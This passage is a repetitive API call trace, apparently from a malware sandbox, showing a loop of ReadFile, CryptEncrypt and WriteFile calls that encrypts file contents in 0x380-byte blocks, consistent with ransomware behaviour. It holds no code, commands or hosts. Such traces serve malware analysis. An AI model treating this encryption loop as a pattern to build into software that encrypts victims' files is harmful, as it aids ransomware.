returned 1 [0273.627] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.627] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.627] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.627] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.627] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.628] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.628] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.628] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.628] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.628] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.628] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.628] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.628] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.628] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.628] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.629] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.629] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.629] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.629] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.629] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.629] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.629] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.629] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.629] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.629] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.629] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.630] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.630] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.630] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.630] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.630] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.630] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.630] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.630] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.630] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.630] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.630] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.630] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.631] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.631] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.631] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.631] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.631] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.631] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.631] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.631] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.631] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.632] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.632] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.632] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.632] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.632] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.632] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.632] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.632] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.632] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.632] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.632] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.633] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.633] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.633] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.633] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.633] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.633] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.633] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.633] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.633] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.633] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.633] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.634] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.634] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.634] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.634] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.634] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.634] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.634] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.634] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.634] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.634] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.634] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.635] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.635] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.635] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.635] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.635] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.635] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.635] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.635] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.635] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.635] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.635] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.635] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.636] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.636] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.636] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.636] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.636] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.636] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.636] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.636] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.636] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.637] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.637] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 